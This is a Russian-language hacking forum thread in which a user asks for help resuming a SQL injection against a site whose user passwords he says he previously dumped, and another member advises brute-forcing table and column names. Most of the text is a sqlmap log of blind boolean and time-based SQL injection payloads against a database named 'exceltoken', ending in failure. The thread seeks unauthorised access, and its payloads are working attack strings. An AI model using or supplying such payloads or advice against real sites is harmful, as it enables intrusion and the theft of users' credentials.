помогите с иньекцией

Discussion in 'Песочница' started by slipknot13, 14 Oct 2017.

  1. slipknot13

    slipknot13 New Member

    Joined:
    14 Oct 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    раньше таблицы дампил а щас не могу
    [​IMG]
    [​IMG]
     
    #1 slipknot13, 14 Oct 2017
  2. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    почему?
     
    #2 erwerr2321, 14 Oct 2017
  3. slipknot13

    slipknot13 New Member

    Joined:
    14 Oct 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    мне кажется что админ поставил какую то защиту , раньше можно было пароли пользователей сдампить а сейчас нет , на сайте вручную пробую Unauthorized Access
     
    #3 slipknot13, 14 Oct 2017
  4. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    ну, а information_schema раньше была?
     
    #4 erwerr2321, 14 Oct 2017
  5. slipknot13

    slipknot13 New Member

    Joined:
    14 Oct 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    да
     
    #5 slipknot13, 14 Oct 2017
  6. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    ну вот... а теперь её нет.
    те тебе сначала нужно подобрать тэйбл нэймы, а потом уже колумн нэймы нужной тебе таблицы.
     
    #6 erwerr2321, 14 Oct 2017
  7. slipknot13

    slipknot13 New Member

    Joined:
    14 Oct 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    я вроде как знаю названия таблиц но их не находит sqlmap
     
    #7 slipknot13, 14 Oct 2017
  8. slipknot13

    slipknot13 New Member

    Joined:
    14 Oct 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    может расскажеш как подобрать тейбл неймы
     
    #8 slipknot13, 14 Oct 2017
  9. slipknot13

    slipknot13 New Member

    Joined:
    14 Oct 2017
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    лог sqlmap
    [19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
    CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
    6b656e),1,1))>66
    [19:41:45] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
    CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
    6b656e),1,1))>52
    [19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
    CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
    6b656e),1,1))>48
    [19:41:46] [PAYLOAD] 14 AND ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table_name) AS
    CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x657863656c746f
    6b656e),1,1))>1
    [19:41:47] [INFO] retrieved:
    [19:41:47] [DEBUG] performed 4 queries in 1.62 seconds
    [19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>66),SLEEP(10),9830)
    [19:41:47] [WARNING] (case) time-based comparison requires larger statistical mo
    [19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>170454),SLEEP(10),9830)
    .
    [19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>819325),SLEEP(10),9830)
    .
    [19:41:47] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>261031),SLEEP(10),9830)
    .
    [19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>164592),SLEEP(10),9830)
    .
    [19:41:48] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>160487),SLEEP(10),9830)
    .
    [19:41:49] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>871054),SLEEP(10),9830)
    .
    [19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>913561),SLEEP(10),9830)
    .
    [19:41:50] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>478526),SLEEP(10),9830)
    .
    [19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>192387),SLEEP(10),9830)
    .
    [19:41:51] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>330357),SLEEP(10),9830)
    .
    [19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>385436),SLEEP(10),9830)
    .
    [19:41:52] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>145149),SLEEP(10),9830)
    .
    [19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>823404),SLEEP(10),9830)
    .
    [19:41:53] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>142557),SLEEP(10),9830)
    .
    [19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>848401),SLEEP(10),9830)
    .
    [19:41:54] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>487756),SLEEP(10),9830)
    .
    [19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>840171),SLEEP(10),9830)
    .
    [19:41:55] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>800333),SLEEP(10),9830)
    .
    [19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>899978),SLEEP(10),9830)
    .
    [19:41:56] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>502795),SLEEP(10),9830)
    .
    [19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>128986),SLEEP(10),9830)
    .
    [19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>227072),SLEEP(10),9830)
    .
    [19:41:57] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>648363),SLEEP(10),9830)
    .
    [19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>656500),SLEEP(10),9830)
    .
    [19:41:58] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>280401),SLEEP(10),9830)
    .
    [19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>721896),SLEEP(10),9830)
    .
    [19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>769715),SLEEP(10),9830)
    .
    [19:41:59] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>689458),SLEEP(10),9830)
    .
    [19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>747115),SLEEP(10),9830)
    .
    [19:42:00] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>103578),SLEEP(10),9830)
    . (done)
    [19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>52),SLEEP(10),9830)
    [19:42:01] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>48),SLEEP(10),9830)
    [19:42:02] [PAYLOAD] 14 AND 9830=IF((ORD(MID((SELECT HEX(IFNULL(CAST(COUNT(table
    _name) AS CHAR),0x20)) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x65786
    3656c746f6b656e),1,1))>1),SLEEP(10),9830)
    [19:42:02] [INFO] retrieved:
    [19:42:02] [DEBUG] performed 4 queries in 15.59 seconds
    [19:42:02] [WARNING] unable to retrieve the number of tables for database 'excel
    token'
    [19:42:02] [ERROR] unable to retrieve the table names for any database
    do you want to use common table existence check? [y/N/q] n
    [19:42:09] [CRITICAL] unable to retrieve the tables in database 'exceltoken'
     
    #9 slipknot13, 14 Oct 2017
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.